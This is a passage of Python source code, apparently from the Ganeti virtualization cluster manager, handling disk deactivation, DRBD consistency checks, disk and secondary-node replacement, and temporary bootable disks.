self.recalculate_locks[locking.LEVEL_NODE] = constants.LOCKS_REPLACE
def DeclareLocks(self, level):
if level == locking.LEVEL_NODE:
self._LockInstancesNodes()
def CheckPrereq(self):
"""Check prerequisites.
This checks that the instance is in the cluster.
"""
self.instance = self.cfg.GetInstanceInfo(self.op.instance_uuid)
assert self.instance is not None, \
"Cannot retrieve locked instance %s" % self.op.instance_name
def Exec(self, feedback_fn):
"""Deactivate the disks
"""
if self.op.force:
ShutdownInstanceDisks(self, self.instance)
else:
_SafeShutdownInstanceDisks(self, self.instance)
def _CheckDiskConsistencyInner(lu, instance, dev, node_uuid, on_primary,
ldisk=False):
"""Check that mirrors are not degraded.
@attention: The device has to be annotated already.
The ldisk parameter, if True, will change the test from the
is_degraded attribute (which represents overall non-ok status for
the device(s)) to the ldisk (representing the local storage status).
"""
result = True
if on_primary or dev.AssembleOnSecondary():
rstats = lu.rpc.call_blockdev_find(node_uuid, (dev, instance))
msg = rstats.fail_msg
if msg:
lu.LogWarning("Can't find disk on node %s: %s",
lu.cfg.GetNodeName(node_uuid), msg)
result = False
elif not rstats.payload:
lu.LogWarning("Can't find disk on node %s", lu.cfg.GetNodeName(node_uuid))
result = False
else:
if ldisk:
result = result and rstats.payload.ldisk_status == constants.LDS_OKAY
else:
result = result and not rstats.payload.is_degraded
if dev.children:
for child in dev.children:
result = result and _CheckDiskConsistencyInner(lu, instance, child,
node_uuid, on_primary)
return result
def CheckDiskConsistency(lu, instance, dev, node_uuid, on_primary, ldisk=False):
"""Wrapper around L{_CheckDiskConsistencyInner}.
"""
(disk,) = AnnotateDiskParams(instance, [dev], lu.cfg)
return _CheckDiskConsistencyInner(lu, instance, disk, node_uuid, on_primary,
ldisk=ldisk)
def _BlockdevFind(lu, node_uuid, dev, instance):
"""Wrapper around call_blockdev_find to annotate diskparams.
@param lu: A reference to the lu object
@param node_uuid: The node to call out
@param dev: The device to find
@param instance: The instance object the device belongs to
@returns The result of the rpc call
"""
(disk,) = AnnotateDiskParams(instance, [dev], lu.cfg)
return lu.rpc.call_blockdev_find(node_uuid, (disk, instance))
def _GenerateUniqueNames(lu, exts):
"""Generate a suitable LV name.
This will generate a logical volume name for the given instance.
"""
results = []
for val in exts:
new_id = lu.cfg.GenerateUniqueID(lu.proc.GetECId())
results.append("%s%s" % (new_id, val))
return results
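# Illustrative result of the helper above (the unique prefixes are generated
# per name; the values shown are made up):
#   _GenerateUniqueNames(lu, [".disk0_data", ".disk0_meta"])
#     -> ["d2ff8c1a-....disk0_data", "7a3b9e02-....disk0_meta"]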
class TLReplaceDisks(Tasklet):
"""Replaces disks for an instance.
Note: Locking is not within the scope of this class.
"""
def __init__(self, lu, instance_uuid, instance_name, mode, iallocator_name,
remote_node_uuid, disks, early_release, ignore_ipolicy):
"""Initializes this class.
"""
Tasklet.__init__(self, lu)
# Parameters
self.instance_uuid = instance_uuid
self.instance_name = instance_name
self.mode = mode
self.iallocator_name = iallocator_name
self.remote_node_uuid = remote_node_uuid
self.disks = disks
self.early_release = early_release
self.ignore_ipolicy = ignore_ipolicy
# Runtime data
self.instance = None
self.new_node_uuid = None
self.target_node_uuid = None
self.other_node_uuid = None
self.remote_node_info = None
self.node_secondary_ip = None
@staticmethod
def _RunAllocator(lu, iallocator_name, instance_uuid,
relocate_from_node_uuids):
"""Compute a new secondary node using an IAllocator.
"""
req = iallocator.IAReqRelocate(
inst_uuid=instance_uuid,
relocate_from_node_uuids=list(relocate_from_node_uuids))
ial = iallocator.IAllocator(lu.cfg, lu.rpc, req)
ial.Run(iallocator_name)
if not ial.success:
raise errors.OpPrereqError("Can't compute nodes using iallocator '%s':"
" %s" % (iallocator_name, ial.info),
errors.ECODE_NORES)
remote_node_name = ial.result[0] # pylint: disable=E1136
remote_node = lu.cfg.GetNodeInfoByName(remote_node_name)
if remote_node is None:
raise errors.OpPrereqError("Node %s not found in configuration" %
remote_node_name, errors.ECODE_NOENT)
lu.LogInfo("Selected new secondary for instance '%s': %s",
instance_uuid, remote_node_name)
return remote_node.uuid
def _FindFaultyDisks(self, node_uuid):
"""Wrapper for L{FindFaultyInstanceDisks}.
"""
return FindFaultyInstanceDisks(self.cfg, self.rpc, self.instance,
node_uuid, True)
def _CheckDisksActivated(self, instance):
"""Checks if the instance disks are activated.
@param instance: The instance to check disks
@return: True if they are activated, False otherwise
"""
node_uuids = self.cfg.GetInstanceNodes(instance.uuid)
for idx, dev in enumerate(self.cfg.GetInstanceDisks(instance.uuid)):
for node_uuid in node_uuids:
self.lu.LogInfo("Checking disk/%d on %s", idx,
self.cfg.GetNodeName(node_uuid))
result = _BlockdevFind(self, node_uuid, dev, instance)
if result.offline:
continue
elif result.fail_msg or not result.payload:
return False
return True
def CheckPrereq(self):
"""Check prerequisites.
This checks that the instance is in the cluster.
"""
self.instance = self.cfg.GetInstanceInfo(self.instance_uuid)
assert self.instance is not None, \
"Cannot retrieve locked instance %s" % self.instance_name
secondary_nodes = self.cfg.GetInstanceSecondaryNodes(self.instance.uuid)
if len(secondary_nodes) != 1:
raise errors.OpPrereqError("The instance has a strange layout,"
" expected one secondary but found %d" %
len(secondary_nodes),
errors.ECODE_FAULT)
secondary_node_uuid = secondary_nodes[0]
if self.iallocator_name is None:
remote_node_uuid = self.remote_node_uuid
else:
remote_node_uuid = self._RunAllocator(self.lu, self.iallocator_name,
self.instance.uuid,
secondary_nodes)
if remote_node_uuid is None:
self.remote_node_info = None
else:
assert remote_node_uuid in self.lu.owned_locks(locking.LEVEL_NODE), \
"Remote node '%s' is not locked" % remote_node_uuid
self.remote_node_info = self.cfg.GetNodeInfo(remote_node_uuid)
assert self.remote_node_info is not None, \
"Cannot retrieve locked node %s" % remote_node_uuid
if remote_node_uuid == self.instance.primary_node:
raise errors.OpPrereqError("The specified node is the primary node of"
" the instance", errors.ECODE_INVAL)
if remote_node_uuid == secondary_node_uuid:
raise errors.OpPrereqError("The specified node is already the"
" secondary node of the instance",
errors.ECODE_INVAL)
if self.disks and self.mode in (constants.REPLACE_DISK_AUTO,
constants.REPLACE_DISK_CHG):
raise errors.OpPrereqError("Cannot specify disks to be replaced",
errors.ECODE_INVAL)
if self.mode == constants.REPLACE_DISK_AUTO:
if not self._CheckDisksActivated(self.instance):
raise errors.OpPrereqError("Please run activate-disks on instance %s"
" first" % self.instance_name,
errors.ECODE_STATE)
faulty_primary = self._FindFaultyDisks(self.instance.primary_node)
faulty_secondary = self._FindFaultyDisks(secondary_node_uuid)
if faulty_primary and faulty_secondary:
raise errors.OpPrereqError("Instance %s has faulty disks on more than"
" one node and can not be repaired"
" automatically" % self.instance_name,
errors.ECODE_STATE)
if faulty_primary:
self.disks = faulty_primary
self.target_node_uuid = self.instance.primary_node
self.other_node_uuid = secondary_node_uuid
check_nodes = [self.target_node_uuid, self.other_node_uuid]
elif faulty_secondary:
self.disks = faulty_secondary
self.target_node_uuid = secondary_node_uuid
self.other_node_uuid = self.instance.primary_node
check_nodes = [self.target_node_uuid, self.other_node_uuid]
else:
self.disks = []
check_nodes = []
else:
# Non-automatic modes
if self.mode == constants.REPLACE_DISK_PRI:
self.target_node_uuid = self.instance.primary_node
self.other_node_uuid = secondary_node_uuid
check_nodes = [self.target_node_uuid, self.other_node_uuid]
elif self.mode == constants.REPLACE_DISK_SEC:
self.target_node_uuid = secondary_node_uuid
self.other_node_uuid = self.instance.primary_node
check_nodes = [self.target_node_uuid, self.other_node_uuid]
elif self.mode == constants.REPLACE_DISK_CHG:
self.new_node_uuid = remote_node_uuid
self.other_node_uuid = self.instance.primary_node
self.target_node_uuid = secondary_node_uuid
check_nodes = [self.new_node_uuid, self.other_node_uuid]
CheckNodeNotDrained(self.lu, remote_node_uuid)
CheckNodeVmCapable(self.lu, remote_node_uuid)
old_node_info = self.cfg.GetNodeInfo(secondary_node_uuid)
assert old_node_info is not None
if old_node_info.offline and not self.early_release:
# doesn't make sense to delay the release
self.early_release = True
self.lu.LogInfo("Old secondary %s is offline, automatically enabling"
" early-release mode", secondary_node_uuid)
else:
raise errors.ProgrammerError("Unhandled disk replace mode (%s)" %
self.mode)
# If not specified all disks should be replaced
if not self.disks:
self.disks = range(len(self.instance.disks))
disks = self.cfg.GetInstanceDisks(self.instance.uuid)
if (not disks or
not utils.AllDiskOfType(disks, [constants.DT_DRBD8])):
raise errors.OpPrereqError("Can only run replace disks for DRBD8-based"
" instances", errors.ECODE_INVAL)
    # TODO: This is ugly, but right now we can't distinguish between an
    # internally submitted opcode and an external one. We should fix that.
if self.remote_node_info:
# We change the node, lets verify it still meets instance policy
new_group_info = self.cfg.GetNodeGroup(self.remote_node_info.group)
cluster = self.cfg.GetClusterInfo()
ipolicy = ganeti.masterd.instance.CalculateGroupIPolicy(cluster,
new_group_info)
CheckTargetNodeIPolicy(self.lu, ipolicy, self.instance,
self.remote_node_info, self.cfg,
ignore=self.ignore_ipolicy)
for node_uuid in check_nodes:
CheckNodeOnline(self.lu, node_uuid)
touched_nodes = frozenset(node_uuid for node_uuid in [self.new_node_uuid,
self.other_node_uuid,
self.target_node_uuid]
if node_uuid is not None)
# Release unneeded node and node resource locks
ReleaseLocks(self.lu, locking.LEVEL_NODE, keep=touched_nodes)
ReleaseLocks(self.lu, locking.LEVEL_NODE_RES, keep=touched_nodes)
# Release any owned node group
ReleaseLocks(self.lu, locking.LEVEL_NODEGROUP)
# Check whether disks are valid
for disk_idx in self.disks:
self.instance.FindDisk(disk_idx)
# Get secondary node IP addresses
self.node_secondary_ip = dict((uuid, node.secondary_ip) for (uuid, node)
in self.cfg.GetMultiNodeInfo(touched_nodes))
def Exec(self, feedback_fn):
"""Execute disk replacement.
This dispatches the disk replacement to the appropriate handler.
"""
if __debug__:
# Verify owned locks before starting operation
owned_nodes = self.lu.owned_locks(locking.LEVEL_NODE)
assert set(owned_nodes) == set(self.node_secondary_ip), \
("Incorrect node locks, owning %s, expected %s" %
(owned_nodes, self.node_secondary_ip.keys()))
assert (self.lu.owned_locks(locking.LEVEL_NODE) ==
self.lu.owned_locks(locking.LEVEL_NODE_RES))
owned_instances = self.lu.owned_locks(locking.LEVEL_INSTANCE)
assert list(owned_instances) == [self.instance_name], \
"Instance '%s' not locked" % self.instance_name
if not self.disks:
feedback_fn("No disks need replacement for instance '%s'" %
self.instance.name)
return
feedback_fn("Replacing disk(s) %s for instance '%s'" %
(utils.CommaJoin(self.disks), self.instance.name))
feedback_fn("Current primary node: %s" %
self.cfg.GetNodeName(self.instance.primary_node))
secondary_nodes = self.cfg.GetInstanceSecondaryNodes(self.instance.uuid)
feedback_fn("Current secondary node: %s" %
utils.CommaJoin(self.cfg.GetNodeNames(secondary_nodes)))
activate_disks = not self.instance.disks_active
# Activate the instance disks if we're replacing them on a down instance
# that is real (forthcoming instances currently only have forthcoming
# disks).
if activate_disks and not self.instance.forthcoming:
StartInstanceDisks(self.lu, self.instance, True)
# Re-read the instance object modified by the previous call
self.instance = self.cfg.GetInstanceInfo(self.instance.uuid)
try:
# Should we replace the secondary node?
if self.new_node_uuid is not None:
fn = self._ExecDrbd8Secondary
else:
fn = self._ExecDrbd8DiskOnly
result = fn(feedback_fn)
finally:
# Deactivate the instance disks if we're replacing them on a
# down instance
if activate_disks and not self.instance.forthcoming:
_SafeShutdownInstanceDisks(self.lu, self.instance,
req_states=INSTANCE_NOT_RUNNING)
self.lu.AssertReleasedLocks(locking.LEVEL_NODE)
if __debug__:
# Verify owned locks
owned_nodes = self.lu.owned_locks(locking.LEVEL_NODE_RES)
nodes = frozenset(self.node_secondary_ip)
assert ((self.early_release and not owned_nodes) or
(not self.early_release and not (set(owned_nodes) - nodes))), \
("Not owning the correct locks, early_release=%s, owned=%r,"
" nodes=%r" % (self.early_release, owned_nodes, nodes))
return result
def _CheckVolumeGroup(self, node_uuids):
self.lu.LogInfo("Checking volume groups")
vgname = self.cfg.GetVGName()
# Make sure volume group exists on all involved nodes
results = self.rpc.call_vg_list(node_uuids)
if not results:
raise errors.OpExecError("Can't list volume groups on the nodes")
for node_uuid in node_uuids:
res = results[node_uuid]
res.Raise("Error checking node %s" % self.cfg.GetNodeName(node_uuid))
if vgname not in res.payload:
raise errors.OpExecError("Volume group '%s' not found on node %s" %
(vgname, self.cfg.GetNodeName(node_uuid)))
def _CheckDisksExistence(self, node_uuids):
# Check disk existence
for idx, dev in enumerate(self.cfg.GetInstanceDisks(self.instance.uuid)):
if idx not in self.disks:
continue
for node_uuid in node_uuids:
self.lu.LogInfo("Checking disk/%d on %s", idx,
self.cfg.GetNodeName(node_uuid))
result = _BlockdevFind(self, node_uuid, dev, self.instance)
msg = result.fail_msg
if msg or not result.payload:
if not msg:
msg = "disk not found"
if not self._CheckDisksActivated(self.instance):
extra_hint = ("\nDisks seem to be not properly activated. Try"
" running activate-disks on the instance before"
" using replace-disks.")
else:
extra_hint = ""
raise errors.OpExecError("Can't find disk/%d on node %s: %s%s" %
(idx, self.cfg.GetNodeName(node_uuid), msg,
extra_hint))
def _CheckDisksConsistency(self, node_uuid, on_primary, ldisk):
for idx, dev in enumerate(self.cfg.GetInstanceDisks(self.instance.uuid)):
if idx not in self.disks:
continue
self.lu.LogInfo("Checking disk/%d consistency on node %s" %
(idx, self.cfg.GetNodeName(node_uuid)))
if not CheckDiskConsistency(self.lu, self.instance, dev, node_uuid,
on_primary, ldisk=ldisk):
raise errors.OpExecError("Node %s has degraded storage, unsafe to"
" replace disks for instance %s" %
(self.cfg.GetNodeName(node_uuid),
self.instance.name))
def _CreateNewStorage(self, node_uuid):
"""Create new storage on the primary or secondary node.
This is only used for same-node replaces, not for changing the
secondary node, hence we don't want to modify the existing disk.
"""
iv_names = {}
inst_disks = self.cfg.GetInstanceDisks(self.instance.uuid)
disks = AnnotateDiskParams(self.instance, inst_disks, self.cfg)
for idx, dev in enumerate(disks):
if idx not in self.disks:
continue
self.lu.LogInfo("Adding storage on %s for disk/%d",
self.cfg.GetNodeName(node_uuid), idx)
lv_names = [".disk%d_%s" % (idx, suffix) for suffix in ["data", "meta"]]
names = _GenerateUniqueNames(self.lu, lv_names)
(data_disk, meta_disk) = dev.children
vg_data = data_disk.logical_id[0]
lv_data = objects.Disk(dev_type=constants.DT_PLAIN, size=dev.size,
logical_id=(vg_data, names[0]),
params=data_disk.params)
vg_meta = meta_disk.logical_id[0]
lv_meta = objects.Disk(dev_type=constants.DT_PLAIN,
size=constants.DRBD_META_SIZE,
logical_id=(vg_meta, names[1]),
params=meta_disk.params)
new_lvs = [lv_data, lv_meta]
old_lvs = [child.Copy() for child in dev.children]
iv_names[dev.iv_name] = (dev, old_lvs, new_lvs)
excl_stor = IsExclusiveStorageEnabledNodeUuid(self.lu.cfg, node_uuid)
# we pass force_create=True to force the LVM creation
for new_lv in new_lvs:
try:
_CreateBlockDevInner(self.lu, node_uuid, self.instance, new_lv, True,
GetInstanceInfoText(self.instance), False,
excl_stor)
except errors.DeviceCreationError, e:
raise errors.OpExecError("Can't create block device: %s" % e.message)
return iv_names
def _CheckDevices(self, node_uuid, iv_names):
for name, (dev, _, _) in iv_names.iteritems():
result = _BlockdevFind(self, node_uuid, dev, self.instance)
msg = result.fail_msg
if msg or not result.payload:
if not msg:
msg = "disk not found"
raise errors.OpExecError("Can't find DRBD device %s: %s" %
(name, msg))
if result.payload.is_degraded:
raise errors.OpExecError("DRBD device %s is degraded!" % name)
def _RemoveOldStorage(self, node_uuid, iv_names):
for name, (_, old_lvs, _) in iv_names.iteritems():
self.lu.LogInfo("Remove logical volumes for %s", name)
for lv in old_lvs:
msg = self.rpc.call_blockdev_remove(node_uuid, (lv, self.instance)) \
.fail_msg
if msg:
self.lu.LogWarning("Can't remove old LV: %s", msg,
hint="remove unused LVs manually")
def _ExecDrbd8DiskOnly(self, feedback_fn): # pylint: disable=W0613
"""Replace a disk on the primary or secondary for DRBD 8.
The algorithm for replace is quite complicated:
1. for each disk to be replaced:
1. create new LVs on the target node with unique names
1. detach old LVs from the drbd device
1. rename old LVs to name_replaced.<time_t>
1. rename new LVs to old LVs
1. attach the new LVs (with the old names now) to the drbd device
1. wait for sync across all devices
1. for each modified disk:
1. remove old LVs (which have the name name_replaced.<time_t>)
Failures are not very well handled.
"""
steps_total = 6
if self.instance.forthcoming:
feedback_fn("Instance forthcoming, not touching disks")
return
# Step: check device activation
self.lu.LogStep(1, steps_total, "Check device existence")
self._CheckDisksExistence([self.other_node_uuid, self.target_node_uuid])
self._CheckVolumeGroup([self.target_node_uuid, self.other_node_uuid])
# Step: check other node consistency
self.lu.LogStep(2, steps_total, "Check peer consistency")
self._CheckDisksConsistency(
self.other_node_uuid, self.other_node_uuid == self.instance.primary_node,
False)
# Step: create new storage
self.lu.LogStep(3, steps_total, "Allocate new storage")
iv_names = self._CreateNewStorage(self.target_node_uuid)
# Step: for each lv, detach+rename*2+attach
self.lu.LogStep(4, steps_total, "Changing drbd configuration")
for dev, old_lvs, new_lvs in iv_names.itervalues():
self.lu.LogInfo("Detaching %s drbd from local storage", dev.iv_name)
result = self.rpc.call_blockdev_removechildren(self.target_node_uuid,
(dev, self.instance),
(old_lvs, self.instance))
result.Raise("Can't detach drbd from local storage on node"
" %s for device %s" %
(self.cfg.GetNodeName(self.target_node_uuid), dev.iv_name))
#dev.children = []
#cfg.Update(instance)
# ok, we created the new LVs, so now we know we have the needed
# storage; as such, we proceed on the target node to rename
# old_lv to _old, and new_lv to old_lv; note that we rename LVs
# using the assumption that logical_id == unique_id on that node
# FIXME(iustin): use a better name for the replaced LVs
temp_suffix = int(time.time())
ren_fn = lambda d, suff: (d.logical_id[0],
d.logical_id[1] + "_replaced-%s" % suff)
# Build the rename list based on what LVs exist on the node
rename_old_to_new = []
for to_ren in old_lvs:
result = self.rpc.call_blockdev_find(self.target_node_uuid,
(to_ren, self.instance))
if not result.fail_msg and result.payload:
# device exists
rename_old_to_new.append((to_ren, ren_fn(to_ren, temp_suffix)))
self.lu.LogInfo("Renaming the old LVs on the target node")
result = self.rpc.call_blockdev_rename(self.target_node_uuid,
rename_old_to_new)
result.Raise("Can't rename old LVs on node %s" %
self.cfg.GetNodeName(self.target_node_uuid))
# Now we rename the new LVs to the old LVs
self.lu.LogInfo("Renaming the new LVs on the target node")
rename_new_to_old = [(new, old.logical_id)
for old, new in zip(old_lvs, new_lvs)]
result = self.rpc.call_blockdev_rename(self.target_node_uuid,
rename_new_to_old)
result.Raise("Can't rename new LVs on node %s" %
self.cfg.GetNodeName(self.target_node_uuid))
# Intermediate steps of in memory modifications
for old, new in zip(old_lvs, new_lvs):
new.logical_id = old.logical_id
# We need to modify old_lvs so that removal later removes the
# right LVs, not the newly added ones; note that old_lvs is a
# copy here
for disk in old_lvs:
disk.logical_id = ren_fn(disk, temp_suffix)
# Now that the new lvs have the old name, we can add them to the device
self.lu.LogInfo("Adding new mirror component on %s",
self.cfg.GetNodeName(self.target_node_uuid))
result = self.rpc.call_blockdev_addchildren(self.target_node_uuid,
(dev, self.instance),
(new_lvs, self.instance))
msg = result.fail_msg
if msg:
for new_lv in new_lvs:
msg2 = self.rpc.call_blockdev_remove(self.target_node_uuid,
(new_lv, self.instance)).fail_msg
if msg2:
self.lu.LogWarning("Can't rollback device %s: %s", dev, msg2,
hint=("cleanup manually the unused logical"
"volumes"))
raise errors.OpExecError("Can't add local storage to drbd: %s" % msg)
cstep = itertools.count(5)
if self.early_release:
self.lu.LogStep(cstep.next(), steps_total, "Removing old storage")
self._RemoveOldStorage(self.target_node_uuid, iv_names)
# TODO: Check if releasing locks early still makes sense
ReleaseLocks(self.lu, locking.LEVEL_NODE_RES)
else:
# Release all resource locks except those used by the instance
ReleaseLocks(self.lu, locking.LEVEL_NODE_RES,
keep=self.node_secondary_ip.keys())
# Release all node locks while waiting for sync
ReleaseLocks(self.lu, locking.LEVEL_NODE)
# TODO: Can the instance lock be downgraded here? Take the optional disk
# shutdown in the caller into consideration.
# Wait for sync
# This can fail as the old devices are degraded and _WaitForSync
# does a combined result over all disks, so we don't check its return value
self.lu.LogStep(cstep.next(), steps_total, "Sync devices")
WaitForSync(self.lu, self.instance)
# Check all devices manually
self._CheckDevices(self.instance.primary_node, iv_names)
# Step: remove old storage
if not self.early_release:
self.lu.LogStep(cstep.next(), steps_total, "Removing old storage")
self._RemoveOldStorage(self.target_node_uuid, iv_names)
def _UpdateDisksSecondary(self, iv_names, feedback_fn):
"""Update the configuration of disks to have a new secondary.
@param iv_names: iterable of triples for all volumes of the instance.
The first component has to be the device and the third the logical
id.
@param feedback_fn: function used to send feedback back to the caller of
the OpCode
"""
self.lu.LogInfo("Updating instance configuration")
for dev, _, new_logical_id in iv_names.itervalues():
dev.logical_id = new_logical_id
self.cfg.Update(dev, feedback_fn)
self.cfg.SetDiskNodes(dev.uuid, [self.instance.primary_node,
self.new_node_uuid])
self.cfg.Update(self.instance, feedback_fn)
def _ExecDrbd8Secondary(self, feedback_fn):
"""Replace the secondary node for DRBD 8.
The algorithm for replace is quite complicated:
- for all disks of the instance:
- create new LVs on the new node with same names
- shutdown the drbd device on the old secondary
- disconnect the drbd network on the primary
- create the drbd device on the new secondary
- network attach the drbd on the primary, using an artifice:
the drbd code for Attach() will connect to the network if it
finds a device which is connected to the good local disks but
not network enabled
- wait for sync across all devices
- remove all disks from the old secondary
Failures are not very well handled.
"""
if self.instance.forthcoming:
feedback_fn("Instance fortcoming, will only update the configuration")
inst_disks = self.cfg.GetInstanceDisks(self.instance.uuid)
minors = self.cfg.AllocateDRBDMinor([self.new_node_uuid
for _ in inst_disks],
self.instance.uuid)
logging.debug("Allocated minors %r", minors)
iv_names = {}
for idx, (dev, new_minor) in enumerate(zip(inst_disks, minors)):
(o_node1, _, o_port, o_minor1, o_minor2, o_secret) = \
dev.logical_id
if self.instance.primary_node == o_node1:
p_minor = o_minor1
else:
p_minor = o_minor2
new_net_id = (self.instance.primary_node, self.new_node_uuid, o_port,
p_minor, new_minor, o_secret)
iv_names[idx] = (dev, dev.children, new_net_id)
logging.debug("Allocated new_minor: %s, new_logical_id: %s", new_minor,
new_net_id)
self._UpdateDisksSecondary(iv_names, feedback_fn)
ReleaseLocks(self.lu, locking.LEVEL_NODE)
return
steps_total = 6
pnode = self.instance.primary_node
# Step: check device activation
self.lu.LogStep(1, steps_total, "Check device existence")
self._CheckDisksExistence([self.instance.primary_node])
self._CheckVolumeGroup([self.instance.primary_node])
# Step: check other node consistency
self.lu.LogStep(2, steps_total, "Check peer consistency")
self._CheckDisksConsistency(self.instance.primary_node, True, True)
# Step: create new storage
self.lu.LogStep(3, steps_total, "Allocate new storage")
inst_disks = self.cfg.GetInstanceDisks(self.instance.uuid)
disks = AnnotateDiskParams(self.instance, inst_disks, self.cfg)
excl_stor = IsExclusiveStorageEnabledNodeUuid(self.lu.cfg,
self.new_node_uuid)
for idx, dev in enumerate(disks):
self.lu.LogInfo("Adding new local storage on %s for disk/%d" %
(self.cfg.GetNodeName(self.new_node_uuid), idx))
# we pass force_create=True to force LVM creation
for new_lv in dev.children:
try:
_CreateBlockDevInner(self.lu, self.new_node_uuid, self.instance,
new_lv, True, GetInstanceInfoText(self.instance),
False, excl_stor)
except errors.DeviceCreationError, e:
raise errors.OpExecError("Can't create block device: %s" % e.message)
# Step 4: drbd minors and drbd setup changes
# after this, we must manually remove the drbd minors on both the
# error and the success paths
self.lu.LogStep(4, steps_total, "Changing drbd configuration")
minors = []
for disk in inst_disks:
minor = self.cfg.AllocateDRBDMinor([self.new_node_uuid], disk.uuid)
minors.append(minor[0])
logging.debug("Allocated minors %r", minors)
iv_names = {}
for idx, (dev, new_minor) in enumerate(zip(inst_disks, minors)):
self.lu.LogInfo("activating a new drbd on %s for disk/%d" %
(self.cfg.GetNodeName(self.new_node_uuid), idx))
# create new devices on new_node; note that we create two IDs:
# one without port, so the drbd will be activated without
# networking information on the new node at this stage, and one
# with network, for the latter activation in step 4
(o_node1, o_node2, o_port, o_minor1, o_minor2, o_secret) = dev.logical_id
if self.instance.primary_node == o_node1:
p_minor = o_minor1
else:
assert self.instance.primary_node == o_node2, "Three-node instance?"
p_minor = o_minor2
new_alone_id = (self.instance.primary_node, self.new_node_uuid, None,
p_minor, new_minor, o_secret)
new_net_id = (self.instance.primary_node, self.new_node_uuid, o_port,
p_minor, new_minor, o_secret)
iv_names[idx] = (dev, dev.children, new_net_id)
logging.debug("Allocated new_minor: %s, new_logical_id: %s", new_minor,
new_net_id)
new_drbd = objects.Disk(dev_type=constants.DT_DRBD8,
logical_id=new_alone_id,
children=dev.children,
size=dev.size,
params={})
(anno_new_drbd,) = AnnotateDiskParams(self.instance, [new_drbd],
self.cfg)
try:
CreateSingleBlockDev(self.lu, self.new_node_uuid, self.instance,
anno_new_drbd,
GetInstanceInfoText(self.instance), False,
excl_stor)
except errors.GenericError:
for disk in inst_disks:
self.cfg.ReleaseDRBDMinors(disk.uuid)
raise
# We have new devices, shutdown the drbd on the old secondary
for idx, dev in enumerate(inst_disks):
self.lu.LogInfo("Shutting down drbd for disk/%d on old node", idx)
msg = self.rpc.call_blockdev_shutdown(self.target_node_uuid,
(dev, self.instance)).fail_msg
if msg:
self.lu.LogWarning("Failed to shutdown drbd for disk/%d on old"
"node: %s" % (idx, msg),
hint=("Please cleanup this device manually as"
" soon as possible"))
self.lu.LogInfo("Detaching primary drbds from the network (=> standalone)")
result = self.rpc.call_drbd_disconnect_net(
[pnode], (inst_disks, self.instance))[pnode]
msg = result.fail_msg
if msg:
# detaches didn't succeed (unlikely)
for disk in inst_disks:
self.cfg.ReleaseDRBDMinors(disk.uuid)
raise errors.OpExecError("Can't detach the disks from the network on"
" old node: %s" % (msg,))
# if we managed to detach at least one, we update all the disks of
# the instance to point to the new secondary
self._UpdateDisksSecondary(iv_names, feedback_fn)
# Release all node locks (the configuration has been updated)
ReleaseLocks(self.lu, locking.LEVEL_NODE)
# and now perform the drbd attach
self.lu.LogInfo("Attaching primary drbds to new secondary"
" (standalone => connected)")
inst_disks = self.cfg.GetInstanceDisks(self.instance.uuid)
result = self.rpc.call_drbd_attach_net([self.instance.primary_node,
self.new_node_uuid],
(inst_disks, self.instance),
False)
for to_node, to_result in result.items():
msg = to_result.fail_msg
if msg:
raise errors.OpExecError(
"Can't attach drbd disks on node %s: %s (please do a gnt-instance "
"info %s to see the status of disks)" %
(self.cfg.GetNodeName(to_node), msg, self.instance.name))
cstep = itertools.count(5)
if self.early_release:
self.lu.LogStep(cstep.next(), steps_total, "Removing old storage")
self._RemoveOldStorage(self.target_node_uuid, iv_names)
# TODO: Check if releasing locks early still makes sense
ReleaseLocks(self.lu, locking.LEVEL_NODE_RES)
else:
# Release all resource locks except those used by the instance
ReleaseLocks(self.lu, locking.LEVEL_NODE_RES,
keep=self.node_secondary_ip.keys())
# TODO: Can the instance lock be downgraded here? Take the optional disk
# shutdown in the caller into consideration.
# Wait for sync
# This can fail as the old devices are degraded and _WaitForSync
# does a combined result over all disks, so we don't check its return value
self.lu.LogStep(cstep.next(), steps_total, "Sync devices")
WaitForSync(self.lu, self.instance)
# Check all devices manually
self._CheckDevices(self.instance.primary_node, iv_names)
# Step: remove old storage
if not self.early_release:
self.lu.LogStep(cstep.next(), steps_total, "Removing old storage")
self._RemoveOldStorage(self.target_node_uuid, iv_names)
class TemporaryDisk(object):
""" Creates a new temporary bootable disk, and makes sure it is destroyed.
It is a context manager and should be used with the ``with`` statement.
The disk is guaranteed to be created at index 0, shifting any other disks of
the instance by one place, and allowing the instance to be booted with the
content of the disk.
"""
def __init__(self, lu, instance, disks, feedback_fn,
shutdown_timeout=constants.DEFAULT_SHUTDOWN_TIMEOUT):
""" Constructor storing arguments until used later.
@type lu: L{ganeti.cmdlib.base.LogicalUnit}
@param lu: The LU within which this disk is created.
@type instance: L{ganeti.objects.Instance}
@param instance: The instance to which the disk should be added
@type disks: list of triples (disk template, disk access mode, int)
@param disks:
disk specification, which is a list of triples containing the
disk template (e.g., L{constants.DT_PLAIN}), the disk access
mode (i.e., L{constants.DISK_RDONLY} or L{constants.DISK_RDWR}),
and size in MiB.
@type feedback_fn: function
@param feedback_fn: Function used to log progress
"""
self._lu = lu
self._instance = instance
self._disks = disks
self._feedback_fn = feedback_fn
self._shutdown_timeout = shutdown_timeout
def _EnsureInstanceDiskState(self):
""" Ensures that the instance is down, and its disks inactive.
All the operations related to the creation and destruction of disks require
that the instance is down and that the disks are inactive. This function is
invoked to make it so.
"""
# The instance needs to be down before any of these actions occur
# Whether it is must be checked manually through a RPC - configuration
# reflects only the desired state
self._feedback_fn("Shutting down instance")
result = self._lu.rpc.call_instance_shutdown(self._instance.primary_node,
self._instance,
self._shutdown_timeout,
self._lu.op.reason)
result.Raise("Shutdown of instance '%s' while removing temporary disk "
"failed" % self._instance.name)
# Disks need to be deactivated prior to being removed
# The disks_active configuration entry should match the actual state
if self._instance.disks_active:
self._feedback_fn("Deactivating disks")
ShutdownInstanceDisks(self._lu, self._instance)
def __enter__(self):
""" Context manager entry function, creating the disk.
@rtype: L{ganeti.objects.Disk}
@return: The disk object created.
"""
self._EnsureInstanceDiskState()
new_disks = []
# The iv_name of the disk intentionally diverges from Ganeti's standards, as
# this disk should be very temporary and its presence should be reported.
# With the special iv_name, gnt-cluster verify detects the disk and warns
# the user of its presence. Removing the disk restores the instance to its
# proper state, despite an error that appears when the removal is performed.
for idx, (disk_template, disk_access, disk_size) in enumerate(self._disks):
new_disk = objects.Disk()
new_disk.dev_type = disk_template
new_disk.mode = disk_access
new_disk.uuid = self._lu.cfg.GenerateUniqueID(self._lu.proc.GetECId())
new_disk.logical_id = (self._lu.cfg.GetVGName(), new_disk.uuid)
new_disk.params = {}
new_disk.size = disk_size
new_disks.append(new_disk)
self._feedback_fn("Attempting to create temporary disk")
